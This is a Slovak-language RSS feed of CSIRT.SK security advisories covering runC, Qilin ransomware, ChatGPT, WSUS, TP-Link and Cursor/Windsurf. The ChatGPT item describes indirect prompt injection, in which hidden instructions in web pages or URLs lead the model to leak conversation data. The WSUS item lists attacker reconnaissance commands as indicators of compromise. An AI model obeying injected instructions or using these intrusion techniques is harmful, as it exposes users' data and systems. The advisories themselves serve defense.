<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2958/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť v kontajneri runC umožňuje únik z izolovaného prostredia</title>
		<link>/posts/2954</link>
					<comments>/posts/2954#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 12 Nov 2025 13:29:05 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[runC]]></category>
		<guid isPermaLink="false">/?p=2954</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/11/runc.png" alt="" /></p>Bezpečnostný výskumník zo spoločnosti SUSE objavil tri zraniteľnosti, ktoré umožňujú lokálnemu útočníkovi za určitých podmienok uniknúť z&#160;izolovaného prostredia softvérového kontajneru...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/11/runc.png" alt="" /></p>
<p><strong>Bezpečnostný výskumník zo spoločnosti SUSE objavil tri zraniteľnosti, ktoré umožňujú lokálnemu útočníkovi za určitých podmienok uniknúť z&nbsp;izolovaného prostredia softvérového kontajneru a&nbsp;získať administrátorské (root) oprávnenia v&nbsp;hostiteľskom systéme.</strong></p>



<p><strong>Zraniteľné systémy podľa jednotlivých CVE:</strong></p>



<ul>
<li>CVE-2025-31133 – všetky verzie runC</li>



<li>CVE-2025-52881 – všetky verzie runC</li>



<li>CVE-2025-52565 – runC verzie 1.0.0-rc3 a&nbsp;vyššie</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-31133</strong> (CVSS 4.0 skóre 7,3)</p>



<p>Zraniteľnosť spočíva v&nbsp;nedostatočnej verifikácii cez funkciu maskedPaths, ktorá je navrhnutá na ochranu citlivých súborov hostiteľa pred prístupom z&nbsp;kontajnerov. Zraniteľnosť umožňuje útočníkovi podvrhnúť nelegitímny kód pomocou symbolického odkazu (symlink) za cestu /dev/null, čím vie pripojiť ľubovoľnú cestu z hostiteľa do kontajnera.</p>



<p><strong>CVE-2025-52881</strong> (CVSS 4.0 skóre 7,3)</p>



<p>Zraniteľnosť umožňuje presmerovať výstup zápisu z cesty /proc cez symbolické odkazy. Týmto spôsobom môže útočník obísť štítky Security Linux Module tým, že presmerujú zápisy runC do podvrhnutých súborov procfs. Zneužitie zraniteľnosti pripomína historickú CVE-2019-19921.</p>



<p><strong>CVE-2025-52565</strong> (CVSS 4.0 skóre 8,4)</p>



<p>Táto zraniteľnosť cieli na operáciu pripojenia (mount) /dev/pts/$n na /dev/console počas inicializácie kontejnera. Nedostatočná validácia umožňuje útočníkom presmerovať toto pripojenie a získať zápisový prístup k chráneným súborom v procfs. Pripojenie /dev/console prebieha pred aplikovaním ochrán maskedPaths a readonlyPaths, čo útočníkom umožňuje manipulovať s cieľom pripojenia a obísť bezpečnostné obmedzenia.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Odopretie služby hostiteľského systému (DoS)</strong></li>



<li><strong>Únik citlivých informácií z&nbsp;hostiteľského systému</strong></li>



<li><strong>Získanie úplnej kontroly nad hostiteľským zariadením</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;developerom odporúčame aktualizovať runC na verziu 1.2.8, 1.3.3, alebo 1.4.0-rc.3 alebo novšiu, podľa produkčných požiadaviek. Ďalej odporúčame aktivovať množiny mien (namespaces) pre všetky kontajnery, čím zamedzia prístup k súborom&nbsp;procfs. Všeobecným odporúčaním je aj využívať tzv. „rootless“ kontajnery ktoré nevyžadujú administrátorské právomoci.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-31133">https://nvd.nist.gov/vuln/detail/CVE-2025-31133</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-52881">https://nvd.nist.gov/vuln/detail/CVE-2025-52881</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-52565">https://nvd.nist.gov/vuln/detail/CVE-2025-52565</a></li>



<li><a href="https://github.com/opencontainers/runc/security/advisories/GHSA-9493-h29p-rfm2">https://github.com/opencontainers/runc/security/advisories/GHSA-9493-h29p-rfm2</a></li>



<li><a href="https://github.com/opencontainers/runc/security/advisories/GHSA-qw9x-cqr3-wc7r">https://github.com/opencontainers/runc/security/advisories/GHSA-qw9x-cqr3-wc7r</a></li>



<li><a href="https://github.com/opencontainers/runc/security/advisories/GHSA-cgrx-mc8f-2prm">https://github.com/opencontainers/runc/security/advisories/GHSA-cgrx-mc8f-2prm</a></li>



<li><a href="https://seclists.org/oss-sec/2025/q4/138">https://seclists.org/oss-sec/2025/q4/138</a></li>



<li><a href="https://www.sysdig.com/blog/runc-container-escape-vulnerabilities">https://www.sysdig.com/blog/runc-container-escape-vulnerabilities</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2954/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktuálna kampaň APT skupiny Qilin zasahuje aj Slovensko</title>
		<link>/posts/2950</link>
					<comments>/posts/2950#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 12 Nov 2025 13:25:37 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[kampaň]]></category>
		<category><![CDATA[Qilin]]></category>
		<guid isPermaLink="false">/?p=2950</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/11/Qilin.png" alt="" /></p>Aktuálna situácia: Qilin je v roku 2025 jednou z najaktívnejších ransomvérových skupín s viac ako 40 úspešnými útokmi mesačne. Celkovo...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/11/Qilin.png" alt="" /></p>
<p><strong>Aktuálna situácia:</strong></p>



<p>Qilin je v roku 2025 jednou z najaktívnejších ransomvérových skupín s viac ako 40 úspešnými útokmi mesačne. Celkovo bolo v roku 2025 zdokumentovaných viac ako 700 útokov, pričom najviac zasiahnutý sektor je výroba (23%). Nasledujú profesionálne a vedecké služby (18%) a veľkoobchod (10%).</p>



<p><strong>Opis útoku:</strong></p>



<p>Útok začína najčastejšie cez ukradnuté administrátorské prihlasovacie údaje (VPN/RDP), ktoré útočníci získavajú z dark webu.</p>



<p>Pre pohyb na sieti používajú viaceré legitímne nástroje ako PsExec, Cobalt Strike, SystemBC, AnyDesk, WinSCP, Splashtop Remote. Na exfiltráciu dát využívajú nástroj Cyberduck. Na vytvorenie perzistencie v systéme útočníci tiež vytvárajú podvrhnuté plánované úlohy (scheduled tasks) a modifikujú registre.</p>



<p>Ako ochranu pred detekciou využívajú techniky BYOVD (Bring Your Own Vulnerable Driver), obfuskáciu PowerShell kódu, vypnutie AMSI, deaktiváciu overovania TLS certifikátov a termináciu bezpečnostného softvéru pomocou nástrojov ako dark-kill a&nbsp;HRSword.</p>



<p><strong>Dopad na Slovensko:</strong></p>



<p>Na území Slovenskej Republiky evidujeme útoky tejto ransomvérovej skupiny v oblasti energetiky  a verejnej správy. Upozorňujeme aj na to, že jej primárny cieľ (výrobný sektor) tvorí značnú súčasť nášho hospodárstva. Práve západné priemyselné spoločnosti, ktoré sú častými cieľmi tejto skupiny, majú svoje pobočky aj na Slovensku.</p>



<p><strong>Odporúčania:<br></strong>Administrátorom odporúčame zvýšenú pozornosť na neobvyklé prístupy cez VPN/RDP, segmentáciu siete a obmedzenie prístupu k citlivým systémom. Ďalej odporúčame pravidelné aktualizácie systémov a&nbsp;aplikácií a&nbsp;následnú kontrolu verzií ovládačov, obzvlášť s ohľadom na zneužívanie zraniteľností a techniky BYOVD.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://blog.talosintelligence.com/uncovering-qilin-attack-methods-exposed-through-multiple-cases/">https://blog.talosintelligence.com/uncovering-qilin-attack-methods-exposed-through-multiple-cases/</a></li>



<li><a href="https://thehackernews.com/2025/10/qilin-ransomware-combines-linux-payload.html">https://thehackernews.com/2025/10/qilin-ransomware-combines-linux-payload.html</a></li>



<li><a href="https://therecord.media/qilin-ransomware-gang-hits-hundreds-of-orgs-2025">https://therecord.media/qilin-ransomware-gang-hits-hundreds-of-orgs-2025</a></li>



<li><a href="https://github.com/Cisco-Talos/IOCs/blob/main/2025/10/uncovering-qilin-attack-methods-exposed-through-multiple-cases.txt">https://github.com/Cisco-Talos/IOCs/blob/main/2025/10/uncovering-qilin-attack-methods-exposed-through-multiple-cases.txt</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2950/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti ChatGPT umožňovali únik citlivých údajov cez &#8220;indirect prompt injection&#8221;</title>
		<link>/posts/2947</link>
					<comments>/posts/2947#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 07 Nov 2025 13:20:21 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ChaGPT]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[OpenAI]]></category>
		<category><![CDATA[SearchGPT]]></category>
		<guid isPermaLink="false">/?p=2947</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/11/OpenAI-1024x687.png" alt="" /></p>Bezpečnostní výskumníci zo spoločnosti Tenable zverejnili informácie o siedmich zraniteľnostiach v systéme OpenAI ChatGPT, ktoré mohli útočníkom umožniť realizáciu tzv....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/11/OpenAI-1024x687.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci zo spoločnosti Tenable zverejnili informácie o siedmich zraniteľnostiach v systéme OpenAI ChatGPT, ktoré mohli útočníkom umožniť realizáciu tzv. indirect prompt injection útokov. Tieto útoky umožňujú získať prístup k citlivým informáciám používateľov prostredníctvom manipulácie vstupov, ktoré model následne spracováva.</strong></p>



<p><strong>Ako útok fungoval</strong></p>



<p><strong>Na rozdiel od klasických injekčných útokov, kde útočník zadáva príkazy priamo do rozhrania AI, indirect prompt injection využíva nepriamy vstup – napríklad text vložený do webovej stránky, ktorú si model načíta pre sumarizáciu. Takto môžu byť do prostredia modelu podvrhnuté skryté inštrukcie, ktoré AI vykoná bez vedomia používateľa.</strong></p>



<p>Podľa Tenable išlo konkrétne o tieto typy zraniteľností:</p>



<ul>
<li><strong>Tri zraniteľnosti</strong> umožňovali podvrhnúť škodlivé príkazy prostredníctvom <strong>obsahu sumarizovanej webovej stránky</strong>.</li>



<li><strong>Ďalšia zraniteľnosť</strong> využívala <strong>načítavanie príkazov z výsledkov indexovaných vyhľadávačmi</strong> (napr. Bing či crawlerom OpenAI).</li>



<li><strong>Jedna zraniteľnosť</strong> spočívala v priamom vložení promptu do URL <em>chatgpt.com/?q={prompt},</em> čo mohlo viesť k manipulácii vstupu používateľa.</li>



<li><strong>Zneužitie whitelisting vyhľadávača</strong> <strong>Bing </strong>mohlo umožniť útočníkom podvrhnúť škodlivé presmerovanie na externé stránky.</li>
</ul>



<p>Tieto techniky dokázali obísť bežné bezpečnostné opatrenia a <strong>získať údaje z histórie konverzácií alebo interného kontextu modelu</strong>.</p>



<p><strong>Záver</strong></p>



<p>Článok referencuje nedávno zverejnené zraniteľnosti v AI vyhľadávačoch, platformách a agentových prehliadačoch, čím poukazuje na vysoké riziká vyplývajúce z využitia týchto technológií. Zverejnené boli aj výsledky výskumu ohľadom manipulácie myslenia modelov AI podvrhnutím veľkého množstva falošných informácií. Kým spoločnosť OpenAI už reagovala opravami, odborníci varujú, že ofenzívne techniky <strong>prompt injection </strong>a<strong> data poisoning</strong> zostávajú otvorenými výzvami pre celý AI ekosystém.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.tenable.com/blog/hackedgpt-novel-ai-vulnerabilities-open-the-door-for-private-data-leakage">https://www.tenable.com/blog/hackedgpt-novel-ai-vulnerabilities-open-the-door-for-private-data-leakage</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2947/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností október 2025</title>
		<link>/posts/2943</link>
					<comments>/posts/2943#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 05 Nov 2025 16:48:46 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2943</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci október 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci október 2025.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/11/2025_10_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/12/2024_11_mesacnik.pdf">Mesačný prehľad – 10/2025 PDF (565 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softver">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2943/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft WSUS má kritickú aktívne zneužívanú zraniteľnosť</title>
		<link>/posts/2932</link>
					<comments>/posts/2932#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 27 Oct 2025 15:51:18 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[WSUS]]></category>
		<guid isPermaLink="false">/?p=2932</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>Služba Windows Server Update Services obsahuje kritickú zraniteľnosť umožňujúcu vzdialene vykonávať kód. Útočníci posielajú upravené požiadavky na porty 8530 a&#160;8531...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Služba Windows Server Update Services obsahuje kritickú zraniteľnosť umožňujúcu vzdialene vykonávať kód. Útočníci posielajú upravené požiadavky na porty 8530 a&nbsp;8531 služby WSUS, čím získavajú kontrolu nad serverom. Microsoft vydal núdzovú aktualizáciu a&nbsp;odporúča zakázať službu WSUS, pokiaľ opravná aktualizácia nie je možná.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Windows Server 2012</li>



<li>Windows Server 2012 (Server Core installation)</li>



<li>Windows Server 2012 R2</li>



<li>Windows Server 2012 R2 (Server Core installation)</li>



<li>Windows Server 2016</li>



<li>Windows Server 2016 (Server Core installation)</li>



<li>Windows Server 2019</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>



<li>Windows Server 2025</li>



<li>Windows Server 2025 (Server Core installation)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-59287</strong> (CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť vo Windows Server Update Services (WSUS) súvisí s nezabezpečenou deserializáciou objektov <em>AuthorizationCookie</em> zaslaných na koncový bod <em>GetCookie()</em>. Absentujúca kontrola typu dát po deserializácii umožňuje neautentifikovanému útočníkovi vzdialene vykonávať kód s právami SYSTEM.</p>



<p>Hackeri aktívne útočia na servery s otvorenými portmi 8530 a 8531 s cieľom zneužiť zraniteľné verzie. Vektorom útoku sú volania POST so špeciálne upravenými <em>AuthorizationCookie</em>. Pri zaznamenaných prípadoch boli zneužité procesy <em>w3wp.exe</em> a <em>wsusservice.exe</em> na spustenie <em>cmd.exe</em> a <em>powershell.exe</em>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia služby WSUS na verzie, ktoré uvádza Microsoft na <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287">svojom webe</a>. Servery je potrebné po aktualizácii reštartovať.</p>



<p>Pokiaľ aktualizácia nie je možná, zraniteľnosť sa dá mitigovať blokovaním prichádzajúcej sieťovej premávky na porty 8530 s 8531, okrem legitímnych zdrojov ako serverov Microsoft Update.</p>



<p>Pokiaľ je rola WSUS vypnutá (štandardné nastavenie), server nie je zraniteľný.</p>



<p><strong>Indikátory kompromitácie:</strong><strong></strong></p>



<p>Logy</p>



<ul>
<li>C:\Program Files\Update Services\Logfiles\SoftwareDistribution.log<ul><li>System.Data.DataSet.DeserializeDataSetSchema (SerializationInfo, StreamingContext)</li></ul><ul><li>System.Runtime.Serialization.ObjectManager.DoFixups()</li></ul><ul><li>System.Runtime.Serialization.ObjectManager.CompleteISerializableObject</li></ul><ul><li>System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation.</li></ul>
<ul>
<li>ErrorWsusService.9HmtWebServices.CheckReportingWebServiceReporting WebService WebException:System.Net.WebException: Unable to connect to the remote server</li>
</ul>
</li>



<li>C:\inetpub\logs\LogFiles\W3SVC*\u_ex*.log
<ul>
<li>POST /ReportingWebService/ReportingWebService.asmx (get_server_id)</li>



<li>POST /SimpleAuthWebService/SimpleAuth.asmx (get_auth_cookie)</li>



<li>POST /ClientWebService/Client.asmx (get_reporting_cookie)</li>



<li>POST /ReportingWebService/ReportingWebService.asmx (send_malicious_event)</li>



<li>POST /ApiRemoting30/WebService.asmx</li>



<li>POST /ReportingWebService/ReportingWebService.asmx &#8211; 8530 &#8211; &lt;IPv4> Windows-Update-Agent – 200</li>
</ul>
</li>
</ul>



<p>Príkazy</p>



<ul>
<li>whoami;net user /domain</li>



<li>net user /domain; ipconfig /all</li>
</ul>



<p>Pre detekciu zneužitia zraniteľnosti existuje verejne dostupné <a href="https://gist.github.com/JohnHammond/83c1fa83475f7b444059dfa824b31409#file-susp_wsusservice_child-yml">pravidlo Sigma</a>.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability">https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability</a></li>



<li><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287</a></li>



<li><a href="https://hawktrace.com/blog/CVE-2025-59287-UNAUTH">https://hawktrace.com/blog/CVE-2025-59287-UNAUTH</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2932/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v bránach TP-Link Omada</title>
		<link>/posts/2929</link>
					<comments>/posts/2929#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 23 Oct 2025 14:57:18 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Omada]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[TP-Link]]></category>
		<guid isPermaLink="false">/?p=2929</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/10/tp-link-1024x691.png" alt="" /></p>Spoločnosť TP-Link vydala bezpečnostné aktualizácie svojich brán Omada, ktoré opravujú 4 zraniteľnosti, z čoho 2 sú označené ako kritické. Kritické...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/10/tp-link-1024x691.png" alt="" /></p>
<p><strong>Spoločnosť TP-Link vydala bezpečnostné aktualizácie svojich brán Omada, ktoré opravujú 4 zraniteľnosti, z čoho 2 sú označené ako kritické. Kritické zraniteľnosti s&nbsp;identifikátormi CVE-2025-6542 a CVE-2025-7850 možno zneužiť na vzdialené vykonanie príkazov operačného systému a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Omada ER8411 vo verziách starších ako 1.3.3 Build 20251013 Rel.44647</li>



<li>Omada ER7412-M2 vo verziách starších ako 1.1.0 Build 20251015 Rel.63594</li>



<li>Omada ER707-M2 vo verziách starších ako 1.3.1 Build 20251009 Rel.67687</li>



<li>Omada ER7206 vo verziách starších ako 2.2.2 Build 20250724 Rel.11109</li>



<li>Omada ER605 vo verziách starších ako 2.3.1 Build 20251015 Rel.78291</li>



<li>Omada ER706W vo verziách starších ako 1.2.1 Build 20250821 Rel.80909</li>



<li>Omada ER706W-4G vo verziách starších ako 1.2.1 Build 20250821 Rel.82492</li>



<li>Omada ER7212PC vo verziách starších ako 2.1.3 Build 20251016 Rel.82571</li>



<li>Omada G36 vo verziách starších ako 1.1.4 Build 20251015 Rel.84206</li>



<li>Omada G611 vo verziách starších ako 1.2.2 Build 20251017 Rel.45512</li>



<li>Omada FR365 vo verziách starších ako 1.1.10 Build 20250626 Rel.81746</li>



<li>Omada FR205 vo verziách starších ako 1.0.3 Build 20251016 Rel.61376</li>



<li>Omada FR307-M2 vo verziách starších ako 1.2.5 Build 20251015 Rel.76743</li>
</ul>



<p><strong>Opis zraniteľností:</strong></p>



<p><strong><u>Kritické zraniteľnosti:</u></strong></p>



<p><strong>CVE-2025-6542 </strong>(CVSS 4.0 skóre 9.3)</p>



<p>CVE-2025-6542 by vzdialený neautentifikovaný útočník mohol zneužiť <strong>na injekciu príkazov operačného systému</strong> a <strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p><strong>CVE-2025-7850 </strong>(CVSS 4.0 skóre 9.3)</p>



<p>Kritickú zraniteľnosť by autentifikovaný útočník s&nbsp;administrátorským prístupom do webového rozhrania brán mohol zneužiť na <strong>injekciu príkazov</strong> a <strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p><strong><u>Vysoko závažné zraniteľnosti:</u></strong></p>



<p><strong>CVE-2025-6541 </strong>(CVSS 4.0 skóre 8.6)</p>



<p>Vysoko závažná zraniteľnosť umožňuje útočníkovi prihlásenému do webového administratívneho rozhrania vykonať <strong>injekciu príkazov operačného systému</strong>.</p>



<p><strong>CVE-2025-7851</strong> (CVSS 4.0 skóre 8.7)</p>



<p>Zraniteľnosť umožňuje získanie neoprávneného <strong>prístupu k&nbsp;systémovému shellu s privilégiami používateľa root</strong>, obmedzenému oprávneniami zraniteľnej brány.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie príkazov</strong></li>



<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu zraniteľných systémov na verzie špecifikované výrobcom. Konkrétne verzie môžete nájsť na stránke výrobcu alebo v&nbsp;časti „Zraniteľné systémy“ tohto varovania. Po aktualizácii systémov taktiež odporúčame vykonať kontrolu konfigurácie zariadení.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.omadanetworks.com/en/document/108455/">https://support.omadanetworks.com/en/document/108455/</a></li>



<li><a href="https://support.omadanetworks.com/us/document/108456/">https://support.omadanetworks.com/us/document/108456/</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/tp-link-warns-of-critical-command-injection-flaw-in-omada-gateways/">https://www.bleepingcomputer.com/news/security/tp-link-warns-of-critical-command-injection-flaw-in-omada-gateways/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2929/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Prostredia Cursor a Windsurf obsahujú desiatky zraniteľností</title>
		<link>/posts/2924</link>
					<comments>/posts/2924#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 22 Oct 2025 12:22:26 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Cursor]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Windsurf]]></category>
		<guid isPermaLink="false">/?p=2924</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/10/Cursor_Windsurf-1024x616.png" alt="" /></p>Bezpečnostní výskumníci spoločnosti Ox Security upozornili na prítomnosť veľkého množstva známych zraniteľností v&#160;aktuálnych verziách vývojových prostredí Cursor a&#160;Windsurf, z&#160;dôvodu implementácie...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/10/Cursor_Windsurf-1024x616.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci spoločnosti Ox Security upozornili na prítomnosť veľkého množstva známych zraniteľností v&nbsp;aktuálnych verziách vývojových prostredí Cursor a&nbsp;Windsurf, z&nbsp;dôvodu implementácie starých verzií nástrojov Chromium a&nbsp;V8. Výskumníci varujú, že ignorovanie či neaktualizovanie takýchto chýb predstavuje vážnu bezpečnostnú hrozbu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Cursor 0.47.6 až 1.7.46 (minimálne)</li>



<li>Windsurf, najnovšia verzia</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>Bezpečnostní výskumníci spoločnosti Ox Security testovali aktuálne verzie vývojových prostredí <strong>Cursor</strong> a&nbsp;<strong>Windsurf</strong>. Zistili, že obsahujú viac ako <strong>94 známych a odstránených zraniteľností</strong> v prehliadačovom nástroji Chromium a JavaScript V8, pretože obe prostredia používajú staršie verzie platformy <strong>Electron</strong>. Približne 1,8 milióna vývojárov, ktorí tieto vývojové prostredia používajú, sa vystavuje riziku útokov prostredníctvom zneužitia niektorej z&nbsp;nich.</p>



<p>Výskumníci problém demonštrovali zneužitím zraniteľnosti CVE-2025-7656 kompilátora Maglev JIT v&nbsp;nástroji V8, keď prostredníctvom škodlivého deeplinku dokázali vykonať príkaz presmerúvajúci prehliadač prostredia (Simple Browser) na zdroj škodlivého kódu. Ten sa vykonal bez detekcie, pretože nebol prítomný priamo v&nbsp;príkaze. Autori Cursor sa vyjadrili, že tento problém je mimo ich záujmu, Windsurf na informáciu nereagoval.</p>



<p>Ako ďalšie praktické scenáre útokov uvádzajú nahratie škodlivého rozšírenia, injektovanie<strong> škodlivého kódu do dokumentácie</strong> a&nbsp;súborov README, ktorý sa v&nbsp;prostrediach vykoná v&nbsp;rámci vykreslenia náhľadu, alebo <strong>spearphishing</strong>.</p>



<p>Popísaný problém môže vyústiť do <strong>útoku na dodávateľský reťazec s&nbsp;významným dopadom</strong>, vrátane <strong>úniku citlivých podnikových informácií</strong>, ktoré majú vývojári uložené na svojich zariadeniach<strong>.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie ľubovoľného kódu</strong></li>



<li><strong>Nedostupnosť aplikácie (DoS)</strong></li>



<li><strong>Únik citlivých údajov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Jedná o problém na strane vývojárov, autori článku však odporúčajú v rámci bezpečnosti infraštruktúry mať prehľad o používaných vývojových prostrediach a monitorovať sieťovú premávku z cieľom odhaliť únik informácií.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.ox.security/blog/94-Vulnerabilities-in-Cursor-and-Windsurf-Put-1-8M-Developers-at-Risk/">https://www.ox.security/blog/94-Vulnerabilities-in-Cursor-and-Windsurf-Put-1-8M-Developers-at-Risk/</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/cursor-windsurf-ides-riddled-with-94-plus-n-day-chromium-vulnerabilities/">https://www.bleepingcomputer.com/news/security/cursor-windsurf-ides-riddled-with-94-plus-n-day-chromium-vulnerabilities/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2924/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť v UEFI modulárnych počítačov Framework umožňuje inštaláciu bootkitov</title>
		<link>/posts/2914</link>
					<comments>/posts/2914#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 21 Oct 2025 14:32:06 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Framework]]></category>
		<category><![CDATA[Secure Boot]]></category>
		<category><![CDATA[UEFI]]></category>
